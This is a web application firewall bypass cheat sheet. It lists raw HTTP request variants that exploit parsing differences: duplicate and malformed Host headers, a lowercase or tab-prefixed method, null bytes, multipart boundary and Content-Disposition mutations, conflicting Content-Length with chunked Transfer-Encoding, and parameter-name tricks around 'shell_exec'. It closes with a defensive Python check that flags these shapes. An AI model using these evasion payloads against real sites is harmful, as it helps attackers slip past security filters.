WAF Bypass Cheat Sheet
Add \r\n before the first line of the HTTP request
GET /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Write the method in lowercase (Apache)
get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Tab before the method (IIS)
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
GET /login?shell_exec HTTP/1.1
GET /login?shell.exec HTTP/1.1
GET /login?shell[exec HTTP/1.1
GET /login?shell%5bexec HTTP/1.1
GET /login?shell%2eexec HTTP/1.1
GET /login?shell%5fexec HTTP/1.1
GET /login?shell%20exec HTTP/1.1
GET /login.php?pam_param=test3
GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3
GET /login.php?hello=world HTTP/1.1
GET /login.php?hello%00another_text=world HTTP/1.1
HTTP request - absoluteURI
GET http://localhost/login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Double Host header
GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Lowercase host
GET /login.php HTTP/1.1
host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host without a space
GET /login.php HTTP/1.1
Host:favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host with a tab
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host with additional symbols
/ : \x00 \x20 \x09 \xad (IIS)
Examples:
GET /login.php HTTP/1.1
Host: favoritewaf.com:12345
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
GET /login.php HTTP/1.1
Host: favoritewaf.com ignored.text
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type with other text
POST /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/another-text/+++x-www-form-urlencoded
hello=world
HTTP request with an incorrect Content-Length (more data than specified)
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Length: 1
AAAAAAAA
Double Content-Type
Content-Type: multipart/form-data; boundary=ZZZ
Content-Type: multipart/form-data; boundary=AAA
Content-Disposition mutations
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=--------1218108630
----------1218108630
Content-Disposition: form-data; name="hello"
world
----------1218108630--
Content-Disposition: form-data; name="hello"
Content-Disposition: form-data; name="hello
Content-Disposition: form-data; name="hello"world"
Content-Disposition: attachment; name="hello"
Content-Type: multipart/form-data; boundary=x
--x
Content-Disposition:
test1;
--x
test2;
--x--
test3;
name="hello"
world
Boundary mutations (PHP)
Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;
==
Content-Type: multipart/form-data; boundary=X;
Null byte
Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX
==
Content-Type: multipart/form-data; boundary=HELLO
Ignored Content-Length
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
hello=world
==
Content-Length: 22
Transfer-Encoding: chunked
0B
hello=world
0
==
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked
3
hel
3
lo=
3
wor
2
ld
0
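A defender-side check for the request shapes listed above, as an added example that is not part of the original cheat sheet: it flags raw requests that a WAF and the backend may parse differently, so they can be rejected or logged before inspection. The function name, finding labels and sample request are constructed for illustration.

```python
import re

METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE", b"OPTIONS", b"PATCH"}

def find_ambiguities(raw: bytes) -> list[str]:
    """Name the request shapes from this page that parsers may read differently."""
    found = []
    if raw.startswith((b"\r\n", b"\n")):
        found.append("leading-crlf")
    head, _, body = raw.lstrip(b"\r\n").partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    if request_line[:1] in (b" ", b"\t"):
        found.append("whitespace-before-method")
    parts = request_line.split()
    if parts and parts[0] not in METHODS and parts[0].upper() in METHODS:
        found.append("non-uppercase-method")
    if len(parts) > 1 and re.match(rb"(?i)https?://", parts[1]):
        found.append("absolute-uri")
    # Collect every value per header name so repeats stay visible.
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip(b" \t"))
    for name in ("host", "content-type", "content-length"):
        if len(headers.get(name.encode(), [])) > 1:
            found.append("duplicate-" + name)
    # After trimming optional whitespace, Host must be a bare name with optional port.
    hosts = headers.get(b"host", [])
    if any(not re.fullmatch(rb"[A-Za-z0-9.-]+(:\d+)?", h) for h in hosts):
        found.append("malformed-host")
    if any(b"\x00" in v for v in headers.get(b"content-type", [])):
        found.append("nul-in-content-type")
    lengths = headers.get(b"content-length", [])
    if lengths and b"transfer-encoding" in headers:
        found.append("content-length-with-transfer-encoding")
    elif len(lengths) == 1 and lengths[0].isdigit() and len(body) > int(lengths[0]):
        found.append("body-exceeds-content-length")
    return found

# Constructed sample built from the "Double Host header" request on this page.
SAMPLE = (b"GET /login.php HTTP/1.1\r\nHost: favoritewaf.com\r\n"
          b"Host: localhost\r\n\r\n")

if __name__ == "__main__":
    print(find_ambiguities(SAMPLE))
```

A request that returns an empty list is not thereby safe; the check only covers the header-level and framing cases, not the parameter-name or multipart body variants.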